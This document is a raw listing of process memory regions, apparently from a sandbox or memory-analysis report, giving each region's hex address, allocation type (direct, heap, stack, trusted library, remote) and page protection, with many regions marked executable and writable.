direct allocation
page execute and read and write
B503000
direct allocation
page execute and read and write
B000000
direct allocation
page execute and read and write
BFF9000
direct allocation
page execute and read and write
B4DD000
direct allocation
page execute and read and write
B7E0000
direct allocation
page execute and read and write
B19B000
direct allocation
page execute and read and write
24CB0000
trusted library allocation
page read and write
3530000
heap
page read and write
74FF000
heap
page read and write
B840000
direct allocation
page execute and read and write
B56B000
direct allocation
page execute and read and write
B06D000
direct allocation
page execute and read and write
B299000
direct allocation
page execute and read and write
24670000
trusted library allocation
page read and write
AEEC000
direct allocation
page execute and read and write
BABA000
direct allocation
page execute and read and write
AFC4000
direct allocation
page execute and read and write
B69F000
direct allocation
page execute and read and write
B943000
direct allocation
page execute and read and write
22B02000
trusted library allocation
page read and write
523E000
stack
page read and write
B1BC000
direct allocation
page execute and read and write
24C80000
trusted library allocation
page read and write
B580000
direct allocation
page execute and read and write
44C0000
remote allocation
page execute and read and write
256D0000
trusted library allocation
page read and write
22A19000
trusted library allocation
page read and write
24AA0000
trusted library allocation
page read and write
B419000
direct allocation
page execute and read and write
BE8E000
direct allocation
page execute and read and write
B983000
direct allocation
page execute and read and write
24EB0000
trusted library allocation
page read and write
AA7F000
direct allocation
page execute and read and write
B0FA000
direct allocation
page execute and read and write
B077000
direct allocation
page execute and read and write
B135000
direct allocation
page execute and read and write
24CA0000
trusted library allocation
page execute and read and write
25780000
trusted library allocation
page read and write
B0C8000
direct allocation
page execute and read and write
B838000
direct allocation
page execute and read and write
ABC0000
direct allocation
page execute and read and write
240B0000
trusted library allocation
page read and write
88A0000
trusted library allocation
page execute and read and write
B326000
direct allocation
page execute and read and write
7A90000
trusted library allocation
page read and write
2418D000
stack
page read and write
7D0B000
stack
page read and write
BCF2000
direct allocation
page execute and read and write
242E1000
heap
page read and write
BB19000
direct allocation
page execute and read and write
83DE000
stack
page read and write
6F70000
direct allocation
page read and write
A9C3000
direct allocation
page execute and read and write
B592000
direct allocation
page execute and read and write
B07B000
direct allocation
page execute and read and write
AEF0000
direct allocation
page execute and read and write
24670000
trusted library allocation
page read and write
B58D000
direct allocation
page execute and read and write
B00E000
direct allocation
page execute and read and write
5330000
direct allocation
page read and write
BAB6000
direct allocation
page execute and read and write
7549000
heap
page read and write
B011000
direct allocation
page execute and read and write
BAD6000
direct allocation
page execute and read and write
B589000
direct allocation
page execute and read and write
2300F000
trusted library allocation
page read and write
B840000
direct allocation
page execute and read and write
BA81000
direct allocation
page execute and read and write
B9ED000
direct allocation
page execute and read and write
BF98000
direct allocation
page execute and read and write
23F30000
trusted library allocation
page read and write
3230000
trusted library allocation
page execute and read and write
BDCD000
direct allocation
page execute and read and write
B299000
direct allocation
page execute and read and write
B846000
direct allocation
page execute and read and write
256B0000
trusted library allocation
page read and write
BE5B000
direct allocation
page execute and read and write
5B7D000
trusted library allocation
page read and write
2740000
heap
page read and write
AF14000
direct allocation
page execute and read and write
B13A000
direct allocation
page execute and read and write
23FA0000
trusted library allocation
page read and write
AE1A000
direct allocation
page execute and read and write
BE07000
direct allocation
page execute and read and write
A692000
direct allocation
page execute and read and write
24DED000
stack
page read and write
BFC8000
direct allocation
page execute and read and write
B9DB000
direct allocation
page execute and read and write
CA0000
heap
page read and write
BC9E000
direct allocation
page execute and read and write
AFFF000
direct allocation
page execute and read and write
B4F1000
direct allocation
page execute and read and write
256D0000
trusted library allocation
page read and write
B1B2000
direct allocation
page execute and read and write
22BFD000
trusted library allocation
page read and write
6ED0000
direct allocation
page read and write
6FC0000
direct allocation
page read and write
BF21000
direct allocation
page execute and read and write
AF5A000
direct allocation
page execute and read and write
8912000
heap
page read and write
B622000
direct allocation
page execute and read and write
B769000
direct allocation
page execute and read and write
B3E9000
direct allocation
page execute and read and write
A7A5000
direct allocation
page execute and read and write
31AE000
stack
page read and write
256D0000
trusted library allocation
page read and write
24D30000
trusted library allocation
page read and write
86B0000
trusted library allocation
page read and write
7BDD000
stack
page read and write
25040000
trusted library allocation
page read and write
B036000
direct allocation
page execute and read and write
B975000
direct allocation
page execute and read and write
AFC8000
direct allocation
page execute and read and write
24EB0000
trusted library allocation
page read and write
A792000
direct allocation
page execute and read and write
AFE1000
direct allocation
page execute and read and write
B55D000
direct allocation
page execute and read and write
25810000
trusted library allocation
page read and write
B495000
direct allocation
page execute and read and write
657A000
heap
page read and write
AFF8000
direct allocation
page execute and read and write
22B89000
trusted library allocation
page read and write
7480000
heap
page read and write
2400000
heap
page read and write
23FA0000
trusted library allocation
page read and write
2242E000
stack
page read and write
BB21000
direct allocation
page execute and read and write
B017000
direct allocation
page execute and read and write
AFB5000
direct allocation
page execute and read and write
AE55000
direct allocation
page execute and read and write
B946000
direct allocation
page execute and read and write
22600000
remote allocation
page read and write
BE3D000
direct allocation
page execute and read and write
B2B3000
direct allocation
page execute and read and write
BD20000
direct allocation
page execute and read and write
B455000
direct allocation
page execute and read and write
24EB0000
trusted library allocation
page read and write
24EB0000
trusted library allocation
page read and write
AB96000
direct allocation
page execute and read and write
24DD0000
trusted library allocation
page read and write
BCAD000
direct allocation
page execute and read and write
610000
heap
page read and write
ADAA000
direct allocation
page execute and read and write
B95B000
direct allocation
page execute and read and write
21FA7000
trusted library allocation
page read and write
527D000
stack
page read and write
23FA0000
trusted library allocation
page read and write
B89C000
direct allocation
page execute and read and write
23C1C000
trusted library allocation
page read and write
24EB0000
trusted library allocation
page read and write
AFE5000
direct allocation
page execute and read and write
B90C000
direct allocation
page execute and read and write
3450000
trusted library allocation
page read and write
25060000
trusted library allocation
page read and write
24D30000
trusted library allocation
page read and write
ACEC000
direct allocation
page execute and read and write
2F70000
trusted library section
page read and write
710B000
heap
page read and write
9EC000
stack
page read and write
B373000
direct allocation
page execute and read and write
B0A5000
direct allocation
page execute and read and write
788E000
heap
page read and write
8820000
trusted library allocation
page read and write
7A80000
trusted library allocation
page read and write
BF17000
direct allocation
page execute and read and write
7890000
trusted library allocation
page read and write
BD46000
direct allocation
page execute and read and write
223EC000
stack
page read and write
24670000
trusted library allocation
page read and write
B805000
direct allocation
page execute and read and write
AFAA000
direct allocation
page execute and read and write
3038000
stack
page read and write
24304000
heap
page read and write
25060000
trusted library allocation
page read and write
B0CD000
direct allocation
page execute and read and write
B85B000
direct allocation
page execute and read and write
BE1F000
direct allocation
page execute and read and write
BE76000
direct allocation
page execute and read and write
B31D000
direct allocation
page execute and read and write
AFFE000
direct allocation
page execute and read and write
B8D2000
direct allocation
page execute and read and write
B0BC000
direct allocation
page execute and read and write
23FA0000
trusted library allocation
page read and write
24AB0000
heap
page read and write
B267000
direct allocation
page execute and read and write
AC3C000
direct allocation
page execute and read and write
B013000
direct allocation
page execute and read and write
ACE9000
direct allocation
page execute and read and write
BA71000
direct allocation
page execute and read and write
7040000
heap
page read and write
22F9D000
trusted library allocation
page read and write
B6D1000
direct allocation
page execute and read and write
BCFC000
direct allocation
page execute and read and write
25700000
trusted library allocation
page read and write
B1FC000
direct allocation
page execute and read and write
5A7000
trusted library allocation
page execute and read and write
AA9A000
direct allocation
page execute and read and write
B293000
direct allocation
page execute and read and write
7503000
heap
page read and write
21ED5000
trusted library allocation
page read and write
24C80000
trusted library allocation
page read and write
257E0000
trusted library allocation
page read and write
AFE3000
direct allocation
page execute and read and write
A83F000
direct allocation
page execute and read and write
2FC2000
trusted library allocation
page read and write
B7B6000
direct allocation
page execute and read and write
256D0000
trusted library allocation
page read and write
24C80000
trusted library allocation
page read and write
B430000
direct allocation
page execute and read and write
AE42000
direct allocation
page execute and read and write
BDCB000
direct allocation
page execute and read and write
7CB0000
trusted library allocation
page read and write
BA73000
direct allocation
page execute and read and write
25060000
trusted library allocation
page read and write
64D0000
direct allocation
page read and write
24D30000
trusted library allocation
page read and write
BABE000
direct allocation
page execute and read and write
B5F6000
direct allocation
page execute and read and write
A7A3000
direct allocation
page execute and read and write
23FB0000
trusted library allocation
page read and write
23094000
trusted library allocation
page read and write
24D40000
trusted library allocation
page read and write
256B0000
trusted library allocation
page read and write
BED5000
direct allocation
page execute and read and write
256D0000
trusted library allocation
page read and write
B397000
direct allocation
page execute and read and write
6F1E000
stack
page read and write
B328000
direct allocation
page execute and read and write
B60F000
direct allocation
page execute and read and write
2FFC000
heap
page read and write
76D0000
trusted library allocation
page read and write
BBFC000
direct allocation
page execute and read and write
ADBA000
direct allocation
page execute and read and write
B61E000
direct allocation
page execute and read and write
BD83000
direct allocation
page execute and read and write
2198D000
stack
page read and write
256D0000
trusted library allocation
page read and write
24C90000
trusted library allocation
page read and write
6500000
direct allocation
page read and write
BCF4000
direct allocation
page execute and read and write
AF1B000
direct allocation
page execute and read and write
23A4A000
trusted library allocation
page read and write
240C0000
heap
page read and write
24D50000
trusted library allocation
page execute and read and write
8A15000
heap
page read and write
AEA9000
direct allocation
page execute and read and write
AE9B000
direct allocation
page execute and read and write
B7C9000
direct allocation
page execute and read and write
AF58000
direct allocation
page execute and read and write
256D0000
trusted library allocation
page read and write
B20C000
direct allocation
page execute and read and write
78E0000
trusted library allocation
page read and write
24D30000
trusted library allocation
page read and write
AE04000
direct allocation
page execute and read and write
BACA000
direct allocation
page execute and read and write
4EA1000
trusted library allocation
page read and write
B1C5000
direct allocation
page execute and read and write
7730000
heap
page read and write
BA41000
direct allocation
page execute and read and write
B894000
direct allocation
page execute and read and write
BD38000
direct allocation
page execute and read and write
256B0000
trusted library allocation
page read and write
755B000
heap
page read and write
B3B8000
direct allocation
page execute and read and write
239FE000
trusted library allocation
page read and write
BAD1000
direct allocation
page execute and read and write
24A90000
trusted library allocation
page read and write
6E47000
heap
page read and write
8780000
heap
page read and write
24EB0000
trusted library allocation
page read and write
256B0000
trusted library allocation
page read and write
BBD0000
direct allocation
page execute and read and write
21DD0000
trusted library allocation
page read and write
B25C000
direct allocation
page execute and read and write
24C80000
trusted library allocation
page read and write
B716000
direct allocation
page execute and read and write
24C80000
trusted library allocation
page read and write
ADF6000
direct allocation
page execute and read and write
BC90000
direct allocation
page execute and read and write
24A90000
trusted library allocation
page read and write
BA8D000
direct allocation
page execute and read and write
B469000
direct allocation
page execute and read and write
B3C1000
direct allocation
page execute and read and write
24670000
trusted library allocation
page read and write
256D0000
trusted library allocation
page read and write
B675000
direct allocation
page execute and read and write
21C9B000
stack
page read and write
B742000
direct allocation
page execute and read and write
23FA0000
trusted library allocation
page read and write
B2E7000
direct allocation
page execute and read and write
24C80000
trusted library allocation
page read and write
B8DC000
direct allocation
page execute and read and write
22DF1000
trusted library allocation
page read and write
24670000
trusted library allocation
page read and write
A80C000
direct allocation
page execute and read and write
B80E000
direct allocation
page execute and read and write
8CD0000
trusted library allocation
page execute and read and write
23FA0000
trusted library allocation
page read and write
24D20000
trusted library allocation
page read and write
2190E000
stack
page read and write
B5C1000
direct allocation
page execute and read and write
24670000
trusted library allocation
page read and write
B836000
direct allocation
page execute and read and write
ABF6000
direct allocation
page execute and read and write
24C80000
trusted library allocation
page read and write
23FA0000
trusted library allocation
page read and write
23FA0000
trusted library allocation
page read and write
3420000
trusted library allocation
page read and write
63D8000
trusted library allocation
page read and write
ACD6000
direct allocation
page execute and read and write
6046000
trusted library allocation
page read and write
70FE000
heap
page read and write
25060000
trusted library allocation
page read and write
25060000
trusted library allocation
page read and write
ACC9000
direct allocation
page execute and read and write
2503E000
stack
page read and write
24C80000
trusted library allocation
page read and write
B8FB000
direct allocation
page execute and read and write
24AA0000
trusted library allocation
page read and write
24C80000
trusted library allocation
page read and write
4B0000
heap
page read and write
B1A4000
direct allocation
page execute and read and write
BC86000
direct allocation
page execute and read and write
B144000
direct allocation
page execute and read and write
A9C1000
direct allocation
page execute and read and write
24670000
trusted library allocation
page read and write
BC64000
direct allocation
page execute and read and write
B2E0000
direct allocation
page execute and read and write
BC76000
direct allocation
page execute and read and write
25700000
trusted library allocation
page read and write
23FA0000
trusted library allocation
page read and write
BEDE000
direct allocation
page execute and read and write
245EE000
stack
page read and write
3490000
trusted library allocation
page execute and read and write
256DF000
trusted library allocation
page read and write
B798000
direct allocation
page execute and read and write
B49E000
direct allocation
page execute and read and write
BA05000
direct allocation
page execute and read and write
B93A000
direct allocation
page execute and read and write
256D0000
trusted library allocation
page read and write
BA69000
direct allocation
page execute and read and write
24A90000
trusted library allocation
page read and write
22974000
trusted library allocation
page read and write
229BC000
trusted library allocation
page read and write
70FD000
heap
page read and write
AC1B000
direct allocation
page execute and read and write
BA53000
direct allocation
page execute and read and write
24EB0000
trusted library allocation
page read and write
A7DB000
direct allocation
page execute and read and write
51C000
heap
page read and write
6570000
heap
page read and write
ACC7000
direct allocation
page execute and read and write
23FA0000
trusted library allocation
page read and write
BB61000
direct allocation
page execute and read and write
ADDE000
direct allocation
page execute and read and write
24D30000
trusted library allocation
page read and write
590000
trusted library allocation
page read and write
B829000
direct allocation
page execute and read and write
24C80000
trusted library allocation
page read and write
B9AA000
direct allocation
page execute and read and write
22C9E000
trusted library allocation
page read and write
BD84000
direct allocation
page execute and read and write
22C9A000
trusted library allocation
page read and write
23FA0000
trusted library allocation
page read and write
AE68000
direct allocation
page execute and read and write
B1D9000
direct allocation
page execute and read and write
B5A5000
direct allocation
page execute and read and write
24C80000
trusted library allocation
page read and write
24EB0000
trusted library allocation
page read and write
30B0000
heap
page read and write
B254000
direct allocation
page execute and read and write
BCF0000
direct allocation
page execute and read and write
24EB0000
trusted library allocation
page read and write
BF77000
direct allocation
page execute and read and write
B067000
direct allocation
page execute and read and write
22FF3000
trusted library allocation
page read and write
B581000
direct allocation
page execute and read and write
24C90000
trusted library allocation
page execute and read and write
24EB0000
trusted library allocation
page read and write
A9EB000
direct allocation
page execute and read and write
BA01000
direct allocation
page execute and read and write
B1B6000
direct allocation
page execute and read and write
21E67000
trusted library allocation
page read and write
AF3C000
direct allocation
page execute and read and write
21EF8000
trusted library allocation
page read and write
256B0000
trusted library allocation
page read and write
24C80000
trusted library allocation
page read and write
B2F3000
direct allocation
page execute and read and write
B056000
direct allocation
page execute and read and write
52D0000
direct allocation
page read and write
BCAB000
direct allocation
page execute and read and write
B8DE000
direct allocation
page execute and read and write
B8CB000
direct allocation
page execute and read and write
ADE8000
direct allocation
page execute and read and write
B35E000
direct allocation
page execute and read and write
B2F5000
direct allocation
page execute and read and write
B1E9000
direct allocation
page execute and read and write
3410000
trusted library allocation
page read and write
BE91000
direct allocation
page execute and read and write
256B0000
trusted library allocation
page read and write
84C2000
heap
page read and write
B01D000
direct allocation
page execute and read and write
B6AE000
direct allocation
page execute and read and write
B83C000
direct allocation
page execute and read and write
BD07000
direct allocation
page execute and read and write
52F0000
direct allocation
page read and write
B69D000
direct allocation
page execute and read and write
BA27000
direct allocation
page execute and read and write
BDF0000
direct allocation
page execute and read and write
B4CF000
direct allocation
page execute and read and write
23F40000
trusted library allocation
page read and write
240BD000
trusted library allocation
page read and write
BC9B000
direct allocation
page execute and read and write
23FA0000
trusted library allocation
page read and write
B856000
direct allocation
page execute and read and write
B425000
direct allocation
page execute and read and write
8C60000
trusted library allocation
page read and write
B14C000
direct allocation
page execute and read and write
24AA0000
trusted library allocation
page read and write
23F30000
trusted library allocation
page read and write
AE3E000
direct allocation
page execute and read and write
8435000
trusted library allocation
page read and write
ADA4000
direct allocation
page execute and read and write
B384000
direct allocation
page execute and read and write
ADD6000
direct allocation
page execute and read and write
B5A9000
direct allocation
page execute and read and write
25780000
trusted library allocation
page read and write
BA09000
direct allocation
page execute and read and write
B097000
direct allocation
page execute and read and write
B5C3000
direct allocation
page execute and read and write
BFC4000
direct allocation
page execute and read and write
6F00000
direct allocation
page read and write
22179000
trusted library allocation
page read and write
21F72000
trusted library allocation
page read and write
BEF1000
direct allocation
page execute and read and write
23FA0000
trusted library allocation
page read and write
BBE0000
direct allocation
page execute and read and write
24EC0000
trusted library allocation
page read and write
B6B9000
direct allocation
page execute and read and write
25780000
trusted library allocation
page read and write
6646000
heap
page read and write
25060000
trusted library allocation
page read and write
B5A0000
direct allocation
page execute and read and write
B01F000
direct allocation
page execute and read and write
25710000
trusted library allocation
page execute and read and write
BC8B000
direct allocation
page execute and read and write
22F0A000
trusted library allocation
page read and write
83F0000
trusted library allocation
page execute and read and write
228B6000
trusted library allocation
page read and write
ADBD000
direct allocation
page execute and read and write
23FA0000
trusted library allocation
page read and write
84A4000
heap
page read and write
B89A000
direct allocation
page execute and read and write
BA59000
direct allocation
page execute and read and write
24CB0000
trusted library allocation
page read and write
21C2F000
stack
page read and write
3220000
trusted library allocation
page read and write
B48C000
direct allocation
page execute and read and write
BDD1000
direct allocation
page execute and read and write
23FA0000
trusted library allocation
page read and write
BDAD000
direct allocation
page execute and read and write
224DE000
stack
page read and write
B6D9000
direct allocation
page execute and read and write
B13C000
direct allocation
page execute and read and write
2263E000
stack
page read and write
23FA0000
trusted library allocation
page read and write
7920000
trusted library allocation
page read and write
25780000
trusted library allocation
page read and write
AEEA000
direct allocation
page execute and read and write
256D0000
trusted library allocation
page read and write
ADE2000
direct allocation
page execute and read and write
256F0000
trusted library allocation
page execute and read and write
B675000
direct allocation
page execute and read and write
23FA0000
trusted library allocation
page read and write
BBFA000
direct allocation
page execute and read and write
B48A000
direct allocation
page execute and read and write
78CB000
heap
page read and write
AF69000
direct allocation
page execute and read and write
B842000
direct allocation
page execute and read and write
240B0000
trusted library allocation
page read and write
25040000
trusted library allocation
page read and write
3148000
trusted library allocation
page read and write
C010000
direct allocation
page execute and read and write
230A7000
trusted library allocation
page read and write
AF3A000
direct allocation
page execute and read and write
AF9F000
direct allocation
page execute and read and write
B28F000
direct allocation
page execute and read and write
BADC000
direct allocation
page execute and read and write
24EED000
stack
page read and write
B575000
direct allocation
page execute and read and write
23112000
trusted library allocation
page read and write
24EB0000
trusted library allocation
page read and write
B4EE000
direct allocation
page execute and read and write
B882000
direct allocation
page execute and read and write
AFCA000
direct allocation
page execute and read and write
AE91000
direct allocation
page execute and read and write
B010000
direct allocation
page execute and read and write
B844000
direct allocation
page execute and read and write
ADC3000
direct allocation
page execute and read and write
B008000
direct allocation
page execute and read and write
B5EA000
direct allocation
page execute and read and write
4E5B000
stack
page read and write
BA14000
direct allocation
page execute and read and write
8840000
trusted library allocation
page read and write
22ECE000
trusted library allocation
page read and write
24EB0000
trusted library allocation
page read and write
BAC8000
direct allocation
page execute and read and write
B9D3000
direct allocation
page execute and read and write
7827000
trusted library allocation
page read and write
A825000
direct allocation
page execute and read and write
B375000
direct allocation
page execute and read and write
256D0000
trusted library allocation
page read and write
22C06000
trusted library allocation
page read and write
B7BD000
direct allocation
page execute and read and write
AF7D000
direct allocation
page execute and read and write
B566000
direct allocation
page execute and read and write
21BEE000
stack
page read and write
23ABD000
trusted library allocation
page read and write
BFAB000
direct allocation
page execute and read and write
BE0C000
direct allocation
page execute and read and write
23FA0000
trusted library allocation
page read and write
24C80000
trusted library allocation
page read and write
B272000
direct allocation
page execute and read and write
25780000
trusted library allocation
page read and write
515E000
stack
page read and write
8330000
trusted library allocation
page read and write
24C80000
trusted library allocation
page read and write
220E5000
trusted library allocation
page read and write
BE93000
direct allocation
page execute and read and write
B5D1000
direct allocation
page execute and read and write
BC94000
direct allocation
page execute and read and write
B0EC000
direct allocation
page execute and read and write
21CF0000
heap
page read and write
94CA000
stack
page read and write
23FB0000
trusted library allocation
page read and write
BECA000
direct allocation
page execute and read and write
BE23000
direct allocation
page execute and read and write
446000
unkown
page readonly
AFC2000
direct allocation
page execute and read and write
B646000
direct allocation
page execute and read and write
24AA0000
trusted library allocation
page read and write
AE07000
direct allocation
page execute and read and write
31CE000
stack
page read and write
BD76000
direct allocation
page execute and read and write
BA0D000
direct allocation
page execute and read and write
24C80000
trusted library allocation
page read and write
23FA0000
trusted library allocation
page read and write
AE7B000
direct allocation
page execute and read and write
B673000
direct allocation
page execute and read and write
3170000
trusted library section
page read and write
ADEA000
direct allocation
page execute and read and write
6371000
trusted library allocation
page read and write
AB1A000
direct allocation
page execute and read and write
2FE0000
trusted library allocation
page read and write
BA18000
direct allocation
page execute and read and write
256D0000
trusted library allocation
page read and write
23FA0000
trusted library allocation
page read and write
7840000
trusted library allocation
page read and write
B002000
direct allocation
page execute and read and write
24A90000
trusted library allocation
page read and write
B3DB000
direct allocation
page execute and read and write
23F30000
trusted library allocation
page read and write
ADD4000
direct allocation
page execute and read and write
BD0D000
direct allocation
page execute and read and write
24B60000
trusted library allocation
page read and write
24C80000
trusted library allocation
page read and write
AF01000
direct allocation
page execute and read and write
AE32000
direct allocation
page execute and read and write
B3D6000
direct allocation
page execute and read and write
BCE8000
direct allocation
page execute and read and write
AC84000
direct allocation
page execute and read and write
344A000
trusted library allocation
page execute and read and write
9700000
direct allocation
page execute and read and write
BB4A000
direct allocation
page execute and read and write
256D0000
trusted library allocation
page read and write
AEE3000
direct allocation
page execute and read and write
B647000
direct allocation
page execute and read and write
B7C7000
direct allocation
page execute and read and write
AEFD000
direct allocation
page execute and read and write
B4CB000
direct allocation
page execute and read and write
B0F9000
direct allocation
page execute and read and write
B158000
direct allocation
page execute and read and write
B905000
direct allocation
page execute and read and write
24304000
heap
page read and write
B60D000
direct allocation
page execute and read and write
B9E3000
direct allocation
page execute and read and write
BC32000
direct allocation
page execute and read and write
B7B8000
direct allocation
page execute and read and write
23FB0000
trusted library allocation
page read and write
B8DA000
direct allocation
page execute and read and write
ABEC000
direct allocation
page execute and read and write
BE4D000
direct allocation
page execute and read and write
24670000
trusted library allocation
page read and write
B7DC000
direct allocation
page execute and read and write
24D30000
trusted library allocation
page read and write
7390000
direct allocation
page read and write
24C80000
trusted library allocation
page read and write
BB0F000
direct allocation
page execute and read and write
22AD2000
trusted library allocation
page read and write
24C08000
heap
page read and write
B423000
direct allocation
page execute and read and write
B18F000
direct allocation
page execute and read and write
22089000
trusted library allocation
page read and write
AD8F000
direct allocation
page execute and read and write
570000
trusted library allocation
page read and write
24EB0000
trusted library allocation
page read and write
23911000
trusted library allocation
page read and write
A5CC000
direct allocation
page execute and read and write
24EB0000
trusted library allocation
page read and write
256B0000
trusted library allocation
page read and write
B6EB000
direct allocation
page execute and read and write
BE1D000
direct allocation
page execute and read and write
A690000
direct allocation
page execute and read and write
23915000
trusted library allocation
page read and write
8440000
trusted library allocation
page read and write
AE4A000
direct allocation
page execute and read and write
21FAB000
trusted library allocation
page read and write
AD87000
direct allocation
page execute and read and write
B137000
direct allocation
page execute and read and write
7C30000
trusted library allocation
page read and write
BC50000
direct allocation
page execute and read and write
B4EA000
direct allocation
page execute and read and write
BCC6000
direct allocation
page execute and read and write
B31B000
direct allocation
page execute and read and write
B8F7000
direct allocation
page execute and read and write
AD75000
direct allocation
page execute and read and write
B395000
direct allocation
page execute and read and write
B988000
direct allocation
page execute and read and write
8890000
trusted library allocation
page execute and read and write
B2FE000
direct allocation
page execute and read and write
2414E000
stack
page read and write
B082000
direct allocation
page execute and read and write
B479000
direct allocation
page execute and read and write
B8DE000
direct allocation
page execute and read and write
23FA0000
trusted library allocation
page read and write
5371000
trusted library allocation
page read and write
AEC8000
direct allocation
page execute and read and write
B1FF000
direct allocation
page execute and read and write
78D3000
heap
page read and write
240B0000
trusted library allocation
page read and write
B451000
direct allocation
page execute and read and write
22F2A000
trusted library allocation
page read and write
B282000
direct allocation
page execute and read and write
6F60000
direct allocation
page read and write
240B0000
trusted library allocation
page read and write
B0FE000
direct allocation
page execute and read and write
256D0000
trusted library allocation
page read and write
4730000
remote allocation
page execute and read and write
7870000
trusted library allocation
page read and write
2569E000
stack
page read and write
BA25000
direct allocation
page execute and read and write
B594000
direct allocation
page execute and read and write
AB18000
direct allocation
page execute and read and write
87E0000
trusted library allocation
page read and write
AFA8000
direct allocation
page execute and read and write
AF5A000
direct allocation
page execute and read and write
ACC0000
direct allocation
page execute and read and write
21C50000
direct allocation
page read and write
AF70000
direct allocation
page execute and read and write
7109000
heap
page read and write
B197000
direct allocation
page execute and read and write
24670000
trusted library allocation
page read and write
240B0000
trusted library allocation
page read and write
A6A3000
direct allocation
page execute and read and write
B3FD000
direct allocation
page execute and read and write
B2B5000
direct allocation
page execute and read and write
256B0000
trusted library allocation
page read and write
ABB7000
direct allocation
page execute and read and write
23FA0000
trusted library allocation
page read and write
7BF0000
trusted library allocation
page execute and read and write
A66E000
direct allocation
page execute and read and write
220DD000
trusted library allocation
page read and write
2DFC000
stack
page read and write
B124000
direct allocation
page execute and read and write
256B0000
trusted library allocation
page read and write
442000
unkown
page readonly
24EB0000
trusted library allocation
page read and write
B2E5000
direct allocation
page execute and read and write
B5C4000
direct allocation
page execute and read and write
BCA5000
direct allocation
page execute and read and write
6E45000
heap
page read and write
24C80000
trusted library allocation
page read and write
BBCE000
direct allocation
page execute and read and write
23FB0000
trusted library allocation
page read and write
352E000
stack
page read and write
24AA6000
trusted library allocation
page read and write
24670000
trusted library allocation
page read and write
23939000
trusted library allocation
page read and write
22AA1000
trusted library allocation
page read and write
2270000
heap
page read and write
B199000
direct allocation
page execute and read and write
B440000
direct allocation
page execute and read and write
24EB0000
trusted library allocation
page read and write
B3F5000
direct allocation
page execute and read and write
24302000
heap
page read and write
BC26000
direct allocation
page execute and read and write
BDF9000
direct allocation
page execute and read and write
B564000
direct allocation
page execute and read and write
228A0000
trusted library allocation
page read and write
256D0000
trusted library allocation
page read and write
B2CA000
direct allocation
page execute and read and write
340F000
stack
page read and write
A863000
direct allocation
page execute and read and write
B004000
direct allocation
page execute and read and write
6810000
heap
page read and write
860B000
heap
page read and write
23931000
trusted library allocation
page read and write
524000
heap
page read and write
8A59000
heap
page read and write
B87D000
direct allocation
page execute and read and write
AFDD000
direct allocation
page execute and read and write
25060000
trusted library allocation
page read and write
662C000
heap
page read and write
256D0000
trusted library allocation
page read and write
25060000
trusted library allocation
page read and write
BE2C000
direct allocation
page execute and read and write
B009000
direct allocation
page execute and read and write
BBCB000
direct allocation
page execute and read and write
5AB000
trusted library allocation
page execute and read and write
BCD0000
direct allocation
page execute and read and write
B9C9000
direct allocation
page execute and read and write
B5C7000
direct allocation
page execute and read and write
BCE7000
direct allocation
page execute and read and write
8790000
heap
page read and write
3480000
heap
page readonly
23BB0000
trusted library allocation
page read and write
BCCE000
direct allocation
page execute and read and write
24D30000
trusted library allocation
page read and write
242C5000
heap
page read and write
24670000
trusted library allocation
page read and write
24A90000
trusted library allocation
page read and write
AFFC000
direct allocation
page execute and read and write
B8BD000
direct allocation
page execute and read and write
23F50000
heap
page read and write
BA03000
direct allocation
page execute and read and write
B810000
direct allocation
page execute and read and write
25040000
trusted library allocation
page read and write
256B0000
trusted library allocation
page read and write
22068000
trusted library allocation
page read and write
B1D1000
direct allocation
page execute and read and write
86A0000
trusted library allocation
page read and write
BDC9000
direct allocation
page execute and read and write
AF23000
direct allocation
page execute and read and write
AD0B000
direct allocation
page execute and read and write
BED8000
direct allocation
page execute and read and write
2565E000
stack
page read and write
6860000
heap
page read and write
6F50000
direct allocation
page read and write
BF93000
direct allocation
page execute and read and write
3160000
heap
page execute and read and write
78C0000
trusted library allocation
page read and write
AE80000
direct allocation
page execute and read and write
B67E000
direct allocation
page execute and read and write
B464000
direct allocation
page execute and read and write
B111000
direct allocation
page execute and read and write
24CB0000
trusted library allocation
page read and write
BA0B000
direct allocation
page execute and read and write
21BB0000
remote allocation
page read and write
BD2C000
direct allocation
page execute and read and write
57D000
trusted library allocation
page execute and read and write
2506D000
trusted library allocation
page read and write
34EE000
stack
page read and write
BA6F000
direct allocation
page execute and read and write
2267F000
stack
page read and write
24302000
heap
page read and write
23FA0000
trusted library allocation
page read and write
BDA6000
direct allocation
page execute and read and write
89D0000
heap
page read and write
4AE000
stack
page read and write
B4DA000
direct allocation
page execute and read and write
B069000
direct allocation
page execute and read and write
BBB2000
direct allocation
page execute and read and write
24C80000
trusted library allocation
page read and write
AE8F000
direct allocation
page execute and read and write
BD68000
direct allocation
page execute and read and write
B118000
direct allocation
page execute and read and write
BA5B000
direct allocation
page execute and read and write
B8A5000
direct allocation
page execute and read and write
256D0000
trusted library allocation
page read and write
BEA7000
direct allocation
page execute and read and write
B9CF000
direct allocation
page execute and read and write
24EC0000
trusted library allocation
page read and write
BCE2000
direct allocation
page execute and read and write
83E0000
heap
page read and write
B22F000
direct allocation
page execute and read and write
21E49000
trusted library allocation
page read and write
AFFD000
direct allocation
page execute and read and write
B71A000
direct allocation
page execute and read and write
BE8C000
direct allocation
page execute and read and write
65E4000
heap
page read and write
B1F9000
direct allocation
page execute and read and write
25700000
trusted library allocation
page read and write
25780000
trusted library allocation
page read and write
23FA0000
trusted library allocation
page read and write
4D20000
trusted library allocation
page execute and read and write
221A1000
trusted library allocation
page read and write
AE36000
direct allocation
page execute and read and write
B0F0000
direct allocation
page execute and read and write
BCE3000
direct allocation
page execute and read and write
256B0000
trusted library allocation
page read and write
256B0000
trusted library allocation
page read and write
BAC6000
direct allocation
page execute and read and write
25780000
trusted library allocation
page read and write
23B14000
trusted library allocation
page read and write
25060000
trusted library allocation
page read and write
24D40000
trusted library allocation
page read and write
BE27000
direct allocation
page execute and read and write
2277E000
stack
page read and write
BA75000
direct allocation
page execute and read and write
BF34000
direct allocation
page execute and read and write
AC97000
direct allocation
page execute and read and write
B699000
direct allocation
page execute and read and write
B11C000
direct allocation
page execute and read and write
401000
unkown
page execute read
23FA0000
trusted library allocation
page read and write
3212000
trusted library allocation
page read and write
BCA9000
direct allocation
page execute and read and write
256D0000
trusted library allocation
page read and write
24C80000
trusted library allocation
page read and write
B2AA000
direct allocation
page execute and read and write
948E000
stack
page read and write
BBA7000
direct allocation
page execute and read and write
BD7C000
direct allocation
page execute and read and write
ADC1000
direct allocation
page execute and read and write
2462F000
stack
page read and write
23FA0000
trusted library allocation
page read and write
24C80000
trusted library allocation
page read and write
BD7C000
direct allocation
page execute and read and write
241B1000
heap
page read and write
